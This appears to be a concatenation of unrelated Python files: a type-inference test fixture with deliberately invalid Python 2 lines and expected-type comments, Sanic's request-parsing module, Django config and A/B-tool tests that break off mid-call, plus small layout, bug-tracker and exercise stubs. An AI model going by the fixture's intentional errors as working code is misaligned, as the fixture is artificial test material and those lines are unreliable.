                        value += coefficients[degree] * (i ** (len(coefficients) - degree - 1))
                if value % m == 0:
                        solutions.append(i)

        return solutions



# NOTE(review): this appears to be a type-inference test fixture: each
# trailing comment encodes the checker's expected result at a column
# offset ("# 0 int" = type at column 0, "# e 4" = expected error at
# column 4).  The Python 2 syntax (backticks, iteritems) and the
# deliberate errors look intentional — confirm against the harness
# before changing ANY line, including these header comments.
a = a # e 4
a = 1       # 0 int
l = [a]     # 0 [int]
d = {a:l}   # 0 {int:[int]}

s = "abc"
c = ord(s[2].lower()[0]) # 0 int # 4 (str) -> int
l2 = [range(i) for i in d] # 0 [[int]]

y = [(a,b) for a,b in {1:'2'}.iteritems()] # 0 [(int,str)]

b = 1 # 0 int
if 0:
    b = '' # 4 str
else:
    b = str(b) # 4 str # 12 int

r = 0 # 0 int
if r: # 3 int
    r = str(r) # 4 str # 12 int
r # 0 <int|str>

l = range(5) # 0 [int]
l2 = l[2:3] # 0 [int]
x = l2[1] # 0 int

k = 1() # 0 <unknown> # e 4

del k
k # e 0

l = [] # 0 [int]
x = 1 # 0 int
while x: # 6 int
    l = [] # 4 [int]
l.append(1) # 0 [int] # 2 (int) -> None

l = [1, 2] # 0 [int]
l2 = [x for x in l] # 0 [<int|str>]
l2.append('') # 0 [<int|str>]

s = str() # 0 str
s2 = str(s) # 0 str
s3 = repr() # e 5 # 0 str
s4 = repr(s) # 0 str

x = 1 if [] else '' # 0 <int|str>

l = [1] # 0 [<int|str>]
l2 = [''] # 0 [str]
l[:] = l2 # 0 [<int|str>]

b = 1 < 2 < 3 # 0 bool

l = sorted(range(5), key=lambda x:-x) # 0 [int]

d = {} # 0 {<bool|int>:<int|str>}
d1 = {1:''} # 0 {int:str}
d.update(d1)
d[True] = 1
d # 0 {<bool|int>:<int|str>}

l = [] # 0 [int]
l1 = [] # 0 [<unknown>]
l.extend(l1)
l.append(2)

l = [] # 0 [<[str]|int>]
l1 = [[]] # 0 [[str]]
l.extend(l1)
l[0].append('') # e 0
l.append(1)

l = [] # 0 [[<int|str>]]
l2 = [1] # 0 [int]
l3 = [''] # 0 [str]
l.append(l2)
l.append(l3)

for i, s in enumerate("aoeu"): # 4 int # 7 str
    pass

x = 1 # 0 int
y = x + 1.0 # 0 float
y << 1 # e 0
l = [1, 1.0] # 0 [float]
1.0 in [1] # e 0

x = `1` # 0 str
def f():
    x = `1` # 4 str

d = dict(a=1) # 0 {str:int}
l = list() # 0 [<unknown>]

i = int(1) # 0 int
i = int(1.2) # 0 int
i = abs(1) # 0 int
i = abs(1.0) # 0 float

d = dict() # 0 {int:int}
d[1] = 2
d2 = dict(d) # 0 {<int|str>:<int|str>}
d2[''] = ''
d3 = dict([(1,2)]) # 0 {int:int}
d4 = dict(a=1) # 0 {str:int}

# Copyright (c) 2016 nVentiveUX
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

"""Application configuration"""

from django.apps import AppConfig


class ShowcaseConfig(AppConfig):
    """Django application configuration for the showcase app."""

    # Full dotted Python path to the application.
    name = 'mystartupmanager.showcase'

import asyncio
import email.utils
import json
import sys

from cgi import parse_header
from collections import namedtuple
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, unquote, urlunparse

from httptools import parse_url

from sanic.exceptions import InvalidUsage
from sanic.log import error_logger, logger


try:
    from ujson import loads as json_loads
except ImportError:
    if sys.version_info[:2] == (3, 5):

        def json_loads(data):
            # on Python 3.5 json.loads only supports str not bytes
            return json.loads(data.decode())

    else:
        json_loads = json.loads


DEFAULT_HTTP_CONTENT_TYPE = "application/octet-stream"


# HTTP/1.1: https://www.w3.org/Protocols/rfc2616/rfc2616-sec7.html#sec7.2.1
# > If the media type remains unknown, the recipient SHOULD treat it
# > as type "application/octet-stream"


class RequestParameters(dict):
    """A dict whose values are lists: ``get`` yields the first element
    of the stored list, while ``getlist`` returns the list itself.
    """

    def get(self, name, default=None):
        """Return the first stored value for *name*, or *default*."""
        if name not in self:
            return default
        return self[name][0]

    def getlist(self, name, default=None):
        """Return the whole list stored under *name*, or *default*."""
        if name in self:
            return self[name]
        return default


class StreamBuffer:
    """Bounded async FIFO over an asyncio.Queue for streamed request bodies."""

    def __init__(self, buffer_size=100):
        self._queue = asyncio.Queue(buffer_size)

    async def read(self):
        """Await and return the next payload; None signals end-of-stream."""
        item = await self._queue.get()
        self._queue.task_done()
        return item

    async def put(self, payload):
        """Enqueue *payload*, suspending while the buffer is full."""
        await self._queue.put(payload)

    def is_full(self):
        """Return True when the queue holds buffer_size items."""
        return self._queue.full()


class Request(dict):
    """Properties of an HTTP request such as URL, headers, etc.

    Body, form, JSON, args and cookies are all parsed lazily on first
    access and cached on the instance.
    """

    # __slots__ keeps per-request memory low; "__weakref__" is listed so
    # instances remain weak-referenceable despite having no __dict__.
    __slots__ = (
        "__weakref__",
        "_cookies",
        "_ip",
        "_parsed_url",
        "_port",
        "_remote_addr",
        "_socket",
        "app",
        "body",
        "endpoint",
        "headers",
        "method",
        "parsed_args",
        "parsed_files",
        "parsed_form",
        "parsed_json",
        "raw_url",
        "stream",
        "transport",
        "uri_template",
        "version",
    )

    def __init__(self, url_bytes, headers, version, method, transport):
        """Store the raw request data; all heavier parsing is deferred."""
        self.raw_url = url_bytes
        # TODO: Content-Encoding detection
        self._parsed_url = parse_url(url_bytes)
        self.app = None

        self.headers = headers
        self.version = version
        self.method = method
        self.transport = transport

        # Init but do not inhale
        self.body_init()
        self.parsed_json = None
        self.parsed_form = None
        self.parsed_files = None
        self.parsed_args = None
        self.uri_template = None
        self._cookies = None
        self.stream = None
        self.endpoint = None

    def __repr__(self):
        return "<{0}: {1} {2}>".format(
            self.__class__.__name__, self.method, self.path
        )

    def __bool__(self):
        # A request is truthy only while its transport is alive.
        if self.transport:
            return True
        return False

    def body_init(self):
        """Reset the body to an empty list of received chunks."""
        self.body = []

    def body_push(self, data):
        """Append one received chunk to the body."""
        self.body.append(data)

    def body_finish(self):
        """Join the collected chunks into a single bytes object."""
        self.body = b"".join(self.body)

    @property
    def json(self):
        """Body parsed as JSON, cached after the first access."""
        if self.parsed_json is None:
            self.load_json()

        return self.parsed_json

    def load_json(self, loads=json_loads):
        """Parse the body with *loads* and cache the result.

        Returns None for an empty body; raises InvalidUsage when a
        non-empty body fails to parse.
        """
        try:
            self.parsed_json = loads(self.body)
        except Exception:
            if not self.body:
                return None
            raise InvalidUsage("Failed when parsing body as json")

        return self.parsed_json

    @property
    def token(self):
        """Attempt to return the auth header token.

        Strips a "Bearer" or "Token" prefix when present; otherwise the
        raw Authorization header value (or None) is returned.

        :return: token related to request
        """
        prefixes = ("Bearer", "Token")
        auth_header = self.headers.get("Authorization")

        if auth_header is not None:
            for prefix in prefixes:
                if prefix in auth_header:
                    return auth_header.partition(prefix)[-1].strip()

        return auth_header

    @property
    def form(self):
        """Body parsed as form data (urlencoded or multipart), cached."""
        if self.parsed_form is None:
            self.parsed_form = RequestParameters()
            self.parsed_files = RequestParameters()
            content_type = self.headers.get(
                "Content-Type", DEFAULT_HTTP_CONTENT_TYPE
            )
            content_type, parameters = parse_header(content_type)
            try:
                if content_type == "application/x-www-form-urlencoded":
                    self.parsed_form = RequestParameters(
                        parse_qs(self.body.decode("utf-8"))
                    )
                elif content_type == "multipart/form-data":
                    # TODO: Stream this instead of reading to/from memory
                    boundary = parameters["boundary"].encode("utf-8")
                    self.parsed_form, self.parsed_files = parse_multipart_form(
                        self.body, boundary
                    )
            except Exception:
                # Best-effort: a malformed body leaves the empty defaults.
                error_logger.exception("Failed when parsing form")

        return self.parsed_form

    @property
    def files(self):
        """Uploaded files from a multipart body (parsed alongside form)."""
        if self.parsed_files is None:
            self.form  # compute form to get files

        return self.parsed_files

    @property
    def args(self):
        """Query-string parameters as RequestParameters, cached."""
        if self.parsed_args is None:
            if self.query_string:
                self.parsed_args = RequestParameters(
                    parse_qs(self.query_string)
                )
            else:
                self.parsed_args = RequestParameters()
        return self.parsed_args

    @property
    def raw_args(self):
        """Query parameters reduced to their first value each."""
        return {k: v[0] for k, v in self.args.items()}

    @property
    def cookies(self):
        """Cookies from the Cookie header as a plain name->value dict."""
        if self._cookies is None:
            cookie = self.headers.get("Cookie")
            if cookie is not None:
                cookies = SimpleCookie()
                cookies.load(cookie)
                self._cookies = {
                    name: cookie.value for name, cookie in cookies.items()
                }
            else:
                self._cookies = {}
        return self._cookies

    @property
    def ip(self):
        """Peer IP of the transport, resolved lazily by _get_address."""
        if not hasattr(self, "_socket"):
            self._get_address()
        return self._ip

    @property
    def port(self):
        """Peer port of the transport, resolved lazily by _get_address."""
        if not hasattr(self, "_socket"):
            self._get_address()
        return self._port

    @property
    def socket(self):
        """Peer (ip, port) pair as reported by the transport."""
        if not hasattr(self, "_socket"):
            self._get_address()
        return self._socket

    def _get_address(self):
        # Falls back to (None, None) when the transport has no peername.
        self._socket = self.transport.get_extra_info("peername") or (
            None,
            None,
        )
        self._ip = self._socket[0]
        self._port = self._socket[1]

    @property
    def remote_addr(self):
        """Attempt to return the original client ip based on X-Forwarded-For.

        :return: original client ip.
        """
        if not hasattr(self, "_remote_addr"):
            forwarded_for = self.headers.get("X-Forwarded-For", "").split(",")
            remote_addrs = [
                addr
                for addr in [addr.strip() for addr in forwarded_for]
                if addr
            ]
            if len(remote_addrs) > 0:
                self._remote_addr = remote_addrs[0]
            else:
                self._remote_addr = ""
        return self._remote_addr

    @property
    def scheme(self):
        """Return http/https, or ws/wss for websocket upgrade requests."""
        if (
            self.app.websocket_enabled
            and self.headers.get("upgrade") == "websocket"
        ):
            scheme = "ws"
        else:
            scheme = "http"

        if self.transport.get_extra_info("sslcontext"):
            scheme += "s"

        return scheme

    @property
    def host(self):
        # it appears that httptools doesn't return the host
        # so pull it from the headers
        return self.headers.get("Host", "")

    @property
    def content_type(self):
        """Content-Type header, defaulting to application/octet-stream."""
        return self.headers.get("Content-Type", DEFAULT_HTTP_CONTENT_TYPE)

    @property
    def match_info(self):
        """return matched info after resolving route"""
        return self.app.router.get(self)[2]

    @property
    def path(self):
        """Request path decoded from the parsed URL bytes."""
        return self._parsed_url.path.decode("utf-8")

    @property
    def query_string(self):
        """Raw query string, or the empty string when absent."""
        if self._parsed_url.query:
            return self._parsed_url.query.decode("utf-8")
        else:
            return ""

    @property
    def url(self):
        """Full URL reassembled from scheme, host, path and query string."""
        return urlunparse(
            (self.scheme, self.host, self.path, None, self.query_string, None)
        )


# An uploaded form file: MIME type, raw bytes, and client-supplied filename.
File = namedtuple("File", ["type", "body", "name"])


def parse_multipart_form(body, boundary):
    """Parse a request body and returns fields and files

    :param body: bytes request body
    :param boundary: bytes multipart boundary
    :return: fields (RequestParameters), files (RequestParameters)
    """
    files = RequestParameters()
    fields = RequestParameters()

    # Splitting on the boundary leaves the preamble first and the
    # closing "--" last; only the slices in between are real parts.
    form_parts = body.split(boundary)
    for form_part in form_parts[1:-1]:
        file_name = None
        content_type = "text/plain"
        content_charset = "utf-8"
        field_name = None
        line_index = 2  # skip the CRLF that follows the boundary
        line_end_index = 0
        # Walk the part's header lines until the blank line before the payload.
        while not line_end_index == -1:
            line_end_index = form_part.find(b"\r\n", line_index)
            form_line = form_part[line_index:line_end_index].decode("utf-8")
            line_index = line_end_index + 2

            # Blank line marks the end of the headers.
            if not form_line:
                break

            colon_index = form_line.index(":")
            form_header_field = form_line[0:colon_index].lower()
            # "+ 2" skips the ": " separator after the header name.
            form_header_value, form_parameters = parse_header(
                form_line[colon_index + 2 :]
            )

            if form_header_field == "content-disposition":
                field_name = form_parameters.get("name")
                file_name = form_parameters.get("filename")

                # non-ASCII filenames in RFC2231, "filename*" format
                if file_name is None and form_parameters.get("filename*"):
                    encoding, _, value = email.utils.decode_rfc2231(
                        form_parameters["filename*"]
                    )
                    file_name = unquote(value, encoding=encoding)
            elif form_header_field == "content-type":
                content_type = form_header_value
                content_charset = form_parameters.get("charset", "utf-8")

        if field_name:
            # "-4" drops the trailing "\r\n--" that precedes the next boundary.
            post_data = form_part[line_index:-4]
            if file_name is None:
                # No filename: treat as a plain field (values accumulate).
                value = post_data.decode(content_charset)
                if field_name in fields:
                    fields[field_name].append(value)
                else:
                    fields[field_name] = [value]
            else:
                form_file = File(
                    type=content_type, name=file_name, body=post_data
                )
                if field_name in files:
                    files[field_name].append(form_file)
                else:
                    files[field_name] = [form_file]
        else:
            logger.debug(
                "Form-data field does not have a 'name' parameter "
                "in the Content-Disposition header"
            )

    return fields, files

from .tile import Split, Stack, TileStack


class Tile(Split):
    """Two-column layout: a single window on the left, the remaining
    windows stacked on the right.
    """

    class left(Stack):
        # NOTE(review): weight/priority/limit semantics are defined by
        # the .tile module — assumed to be relative size, creation
        # order, and max window count; confirm there.
        weight = 3
        priority = 0
        limit = 1

    class right(TileStack):
        pass


class Max(Split):
    """Single untiled stack holding every window."""

    class main(Stack):
        tile = False


class InstantMsg(Split):
    """Instant-messenger layout: wide conversation area plus a narrow roster."""

    class left(TileStack): # or maybe not tiled ?
        weight = 3

    class roster(Stack):
        limit = 1
        priority = 0  # probably roster created first


class Gimp(Split):
    """Three-column GIMP-style layout: toolbox, main canvas, dock."""

    class toolbox(Stack):
        # NOTE(review): `size` presumably is a fixed pixel width — confirm
        # against the .tile module.
        limit = 1
        size = 184

    class main(Stack):
        weight = 4
        priority = 0

    class dock(Stack):
        limit = 1
        size = 324

# Hard-coded "hmm"-reaction GIF URLs (Giphy CDN); presumably one is
# picked at random by the caller — confirm at the use site.
hmm = [
    "https://media3.giphy.com/media/TPl5N4Ci49ZQY/giphy.gif",
    "https://media0.giphy.com/media/l14qxlCgJ0zUk/giphy.gif",
    "https://media4.giphy.com/media/MsWnkCVSXz73i/giphy.gif",
    "https://media1.giphy.com/media/l2JJEIMLgrXPEbDGM/giphy.gif",
    "https://media0.giphy.com/media/dgK22exekwOLm/giphy.gif"
]
from djblets.cache.backend import cache_memoize


class BugTracker(object):
    """An interface to a bug tracker.

    BugTracker subclasses are used to enable interaction with different
    bug trackers.
    """

    def get_bug_info(self, repository, bug_id):
        """Get the information for the specified bug.

        This should return a dictionary with 'summary', 'description',
        and 'status' keys.

        Results are cached for 60 seconds, which keeps the number of
        queries to the bug tracker down and makes infobox loads after
        the first feel fast, while still serving reasonably fresh data.
        """
        cache_key = self.make_bug_cache_key(repository, bug_id)

        return cache_memoize(
            cache_key,
            lambda: self.get_bug_info_uncached(repository, bug_id),
            expiration=60)

    def get_bug_info_uncached(self, repository, bug_id):
        """Get the information for the specified bug (implementation).

        This should be implemented by subclasses, and should return a
        dictionary with 'summary', 'description', and 'status' keys.
        If any of those are unsupported by the given bug tracker, the
        unknown values should be given as an empty string.
        """
        info = {}
        for key in ('summary', 'description', 'status'):
            info[key] = ''

        return info

    def make_bug_cache_key(self, repository, bug_id):
        """Returns a key to use when caching fetched bug information."""
        return 'repository-%s-bug-%s' % (repository.pk, bug_id)

import sys
from stack import Stack


def parse_expression_into_parts(expression):
    """
    Parse expression into list of parts
    :rtype : list
    :param expression: str # i.e. "2 * 3 + ( 2 - 3 )"
    """
    # Exercise stub: intentionally unimplemented.
    raise NotImplementedError("complete me!")


def evaluate_expression(a, b, op):
    """Apply binary operator *op* to operands *a* and *b* (exercise stub)."""
    raise NotImplementedError("complete me!")


def evaluate_postfix(parts):
    """Evaluate a postfix (RPN) token list and return the result (exercise stub)."""
    raise NotImplementedError("complete me!")


if __name__ == "__main__":
    expr = None
    if len(sys.argv) > 1:
        expr = sys.argv[1]
        parts = parse_expression_into_parts(expr)
        print "Evaluating %s == %s" % (expr, evaluate_postfix(parts))
    else:
        print 'Usage: python postfix.py "<expr>" -- i.e. python postfix.py "9 1 3 + 2 * -"'
        print "Spaces are required between every term."

#!/usr/bin/python
# -*- coding: utf-8 -*-
# @author victor li nianchaoli@msn.cn
# @date 2015/10/07

import baseHandler

class MainHandler(baseHandler.RequestHandler):
    """Handler for the site root."""

    def get(self):
        # Forward every GET to the most recent post.
        self.redirect('/posts/last')

from ab_tool.tests.common import (SessionTestCase, TEST_COURSE_ID,
    TEST_OTHER_COURSE_ID, NONEXISTENT_TRACK_ID, NONEXISTENT_EXPERIMENT_ID,
    APIReturn, LIST_MODULES)
from django.core.urlresolvers import reverse
from ab_tool.models import (Experiment, InterventionPointUrl)
from ab_tool.exceptions import (EXPERIMENT_TRACKS_ALREADY_FINALIZED,
    NO_TRACKS_FOR_EXPERIMENT, UNAUTHORIZED_ACCESS,
    INTERVENTION_POINTS_ARE_INSTALLED)
import json
from mock import patch

class TestExperimentPages(SessionTestCase):
    """ Tests related to Experiment and Experiment pages and methods """
    
    def test_create_experiment_view(self):
        """ Tests edit_experiment template renders for url 'create_experiment' """
        response = self.client.get(reverse("ab_testing_tool_create_experiment"))
        self.assertOkay(response)
        self.assertTemplateUsed(response, "ab_tool/edit_experiment.html")
    
    def test_create_experiment_view_unauthorized(self):
        """ Tests edit_experiment template does not render for url 'create_experiment'
            when unauthorized """
        self.set_roles([])
        response = self.client.get(reverse("ab_testing_tool_create_experiment"), follow=True)
        self.assertTemplateNotUsed(response, "ab_tool/create_experiment.html")
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_edit_experiment_view(self):
        """ Tests edit_experiment template renders when authenticated """
        experiment = self.create_test_experiment()
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)))
        self.assertTemplateUsed(response, "ab_tool/edit_experiment.html")
    
    def test_edit_experiment_view_started_experiment(self):
        """ Tests edit_experiment template renders when experiment has started """
        experiment = self.create_test_experiment()
        experiment.tracks_finalized = True
        experiment.save()
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)))
        self.assertTemplateUsed(response, "ab_tool/edit_experiment.html")
    
    def test_edit_experiment_view_with_tracks_weights(self):
        """ Tests edit_experiment template renders properly with track weights """
        experiment = self.create_test_experiment()
        # NOTE(review): assignment_method is set but never save()d here; the
        # page render below does not appear to depend on it -- confirm intent.
        experiment.assignment_method = Experiment.WEIGHTED_PROBABILITY_RANDOM
        track1 = self.create_test_track(name="track1", experiment=experiment)
        track2 = self.create_test_track(name="track2", experiment=experiment)
        self.create_test_track_weight(experiment=experiment, track=track1)
        self.create_test_track_weight(experiment=experiment, track=track2)
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)))
        self.assertTemplateUsed(response, "ab_tool/edit_experiment.html")
    
    def test_edit_experiment_view_unauthorized(self):
        """ Tests edit_experiment template doesn't render when unauthorized """
        self.set_roles([])
        experiment = self.create_test_experiment(course_id=TEST_OTHER_COURSE_ID)
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)),
                                   follow=True)
        self.assertTemplateNotUsed(response, "ab_tool/edit_experiment.html")
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_edit_experiment_view_nonexistent(self):
        """Tests edit_experiment when experiment does not exist"""
        e_id = NONEXISTENT_EXPERIMENT_ID
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(e_id,)))
        self.assertTemplateNotUsed(response, "ab_tool/edit_experiment.html")
        self.assertEquals(response.status_code, 404)
    
    def test_edit_experiment_view_wrong_course(self):
        """ Tests edit_experiment when attempting to access a experiment from a different course """
        experiment = self.create_test_experiment(course_id=TEST_OTHER_COURSE_ID)
        response = self.client.get(reverse("ab_testing_tool_edit_experiment", args=(experiment.id,)))
        self.assertError(response, UNAUTHORIZED_ACCESS)

    def test_edit_experiment_view_last_modified_updated(self):
        """ Tests edit_experiment to confirm that the last updated timestamp changes """
        experiment = self.create_test_experiment()
        experiment.name += " (updated)"
        response = self.client.post(reverse("ab_testing_tool_submit_edit_experiment",
                                            args=(experiment.id,)),
                                    content_type="application/json",
                                    data=experiment.to_json())
        self.assertEquals(response.content, "success")
        # Re-fetch from the DB: updated_on should have moved forward.
        updated_experiment = Experiment.objects.get(id=experiment.id)
        self.assertLess(experiment.updated_on, updated_experiment.updated_on,
                        response)

    
    def test_submit_create_experiment(self):
        """ Tests that create_experiment creates a Experiment object verified by
            DB count when uniformRandom is true"""
        Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        num_experiments = Experiment.objects.count()
        experiment = {
                "name": "experiment", "notes": "hi", "uniformRandom": True,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": None, "name": "A"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_create_experiment"), follow=True,
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(num_experiments + 1, Experiment.objects.count(), response)

    def test_submit_create_experiment_csv_upload(self):
        """ Tests that create_experiment creates a Experiment object verified by
            DB count when csvUpload is True and no track weights are specified"""
        Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        num_experiments = Experiment.objects.count()
        experiment = {
                "name": "experiment", "notes": "hi", "uniformRandom": False,
                "csvUpload": True,
                "tracks": [{"id": None, "name": "A"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_create_experiment"), follow=True,
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(num_experiments + 1, Experiment.objects.count(), response)

    def test_submit_create_experiment_with_weights_as_assignment_method(self):
        """ Tests that create_experiment creates a Experiment object verified by
            DB count when uniformRandom is false and the tracks have weightings """
        Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        num_experiments = Experiment.objects.count()
        experiment = {
                "name": "experiment", "notes": "hi", "uniformRandom": False,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": 100, "name": "A"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_create_experiment"), follow=True,
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(num_experiments + 1, Experiment.objects.count(), response)
    
    def test_submit_create_experiment_unauthorized(self):
        """Tests that create_experiment creates a Experiment object verified by DB count"""
        self.set_roles([])
        Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        num_experiments = Experiment.objects.count()
        experiment = {"name": "experiment", "notes": "hi"}
        response = self.client.post(
            reverse("ab_testing_tool_submit_create_experiment"), follow=True,
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(num_experiments, Experiment.objects.count())
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_submit_edit_experiment(self):
        """ Tests that submit_edit_experiment does not change DB count but does change Experiment
            attribute"""
        experiment = self.create_test_experiment(name="old_name")
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        experiment = {
                "name": "new_name", "notes": "hi", "uniformRandom": True,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": None, "name": "A"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.name, "new_name")
    
    def test_submit_edit_experiment_changes_assignment_method_to_weighted(self):
        """ Tests that submit_edit_experiment changes an Experiment's assignment
            method from uniform (default) to weighted"""
        experiment = self.create_test_experiment(name="old_name")
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        no_track_weights = experiment.track_probabilites.count()
        experiment = {
                "name": "new_name", "notes": "hi", "uniformRandom": False,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": 20, "name": "A"},
                           {"id": None, "weighting": 80, "name": "B"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.assignment_method, Experiment.WEIGHTED_PROBABILITY_RANDOM)
        self.assertEquals(experiment.track_probabilites.count(), no_track_weights + 2)
    
    def test_submit_edit_experiment_changes_assignment_method_to_uniform(self):
        """ Tests that submit_edit_experiment changes an Experiment's assignment
            method from weighted uniform """
        experiment = self.create_test_experiment(
                name="old_name", assignment_method=Experiment.WEIGHTED_PROBABILITY_RANDOM)
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        no_tracks = experiment.tracks.count()
        experiment = {
                "name": "new_name", "notes": "hi", "uniformRandom": True,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": None, "name": "A"},
                           {"id": None, "weighting": None, "name": "B"},
                           {"id": None, "weighting": None, "name": "C"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.assignment_method, Experiment.UNIFORM_RANDOM)
        self.assertEquals(experiment.tracks.count(), no_tracks + 3)
    
    def test_submit_edit_experiment_unauthorized(self):
        """ Tests submit_edit_experiment when unauthorized"""
        self.set_roles([])
        experiment = self.create_test_experiment(name="old_name")
        experiment_id = experiment.id
        experiment = {"name": "new_name", "notes": ""}
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            content_type="application/json", data=json.dumps(experiment), follow=True
        )
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_submit_edit_experiment_nonexistent(self):
        """ Tests that submit_edit_experiment method raises error for non-existent Experiment """
        experiment_id = NONEXISTENT_EXPERIMENT_ID
        experiment = {"name": "new_name", "notes": ""}
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            content_type="application/json", data=json.dumps(experiment)
        )
        self.assertEquals(response.status_code, 404)
    
    def test_submit_edit_experiment_wrong_course(self):
        """ Tests that submit_edit_experiment method raises error for existent Experiment but
            for wrong course"""
        experiment = self.create_test_experiment(name="old_name",
                                       course_id=TEST_OTHER_COURSE_ID)
        data = {"name": "new_name", "notes": ""}
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment.id,)),
            content_type="application/json", data=json.dumps(data)
        )
        self.assertError(response, UNAUTHORIZED_ACCESS)
    
    def test_submit_edit_started_experiment_changes_name_and_notes(self):
        """ Tests that submit_edit_experiment changes an Experiment's
            name and notes and track names only if the experiment has already been started """
        experiment = self.create_test_experiment(name="old_name", notes="old_notes",
                                                 tracks_finalized=True)
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        old_track = self.create_test_track(experiment=experiment, name="old_name_track")
        experiment_json = {
                "name": "new_name", "notes": "new_notes", "tracks": [{"id": old_track.id,
                  "name": "new_track_name"}],
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment_json)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.name, "new_name")
        self.assertEquals(experiment.notes, "new_notes")
        self.assertEquals(experiment.tracks.all()[0].name, "new_track_name")
    
    def test_submit_edit_started_experiment_does_not_change_tracks(self):
        """ Tests that submit_edit_experiment doesn't change tracks for
            an experiment that has already been started """
        experiment = self.create_test_experiment(name="old_name", tracks_finalized=True,
                assignment_method=Experiment.WEIGHTED_PROBABILITY_RANDOM)
        experiment_id = experiment.id
        num_experiments = Experiment.objects.count()
        no_tracks = experiment.tracks.count()
        experiment = {
                "name": "new_name", "notes": "hi", "uniformRandom": True,
                "csvUpload": False,
                "tracks": [{"id": None, "weighting": None, "name": "A"},
                           {"id": None, "weighting": None, "name": "B"},
                           {"id": None, "weighting": None, "name": "C"}]
        }
        response = self.client.post(
            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment_id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment)
        )
        self.assertOkay(response)
        self.assertEquals(num_experiments, Experiment.objects.count())
        experiment = Experiment.objects.get(id=experiment_id)
        self.assertEquals(experiment.assignment_method, Experiment.WEIGHTED_PROBABILITY_RANDOM)
        self.assertEquals(experiment.tracks.count(), no_tracks)
    
    def test_submit_edit_started_experiment_changes_existing_tracks(self):
        """ Tests that submit_edit_experiment does change track objects for
            an experiment that has not yet been started """
        experiment = self.create_test_experiment(name="old_name", tracks_finalized=False,
                assignment_method=Experiment.WEIGHTED_PROBABILITY_RANDOM)
        track1 = self.create_test_track(experiment=experiment, name="A")
        track2 = self.create_test_track(experiment=experiment, name="B")
        self.create_test_track_weight(experiment=experiment, track=track1)
        self.create_test_track_weight(experiment=experiment, track=track2)
        track_count = experiment.tracks.count()
        experiment_json = {
                "name": "new_name", "notes": "hi", "uniformRandom": False,
                "csvUpload": False,
                "tracks": [{"id": track1.id, "weighting": 30, "name": "C"},
                           {"id": track2.id, "weighting": 70, "name": "D"}]
        }
        response = self.client.post(
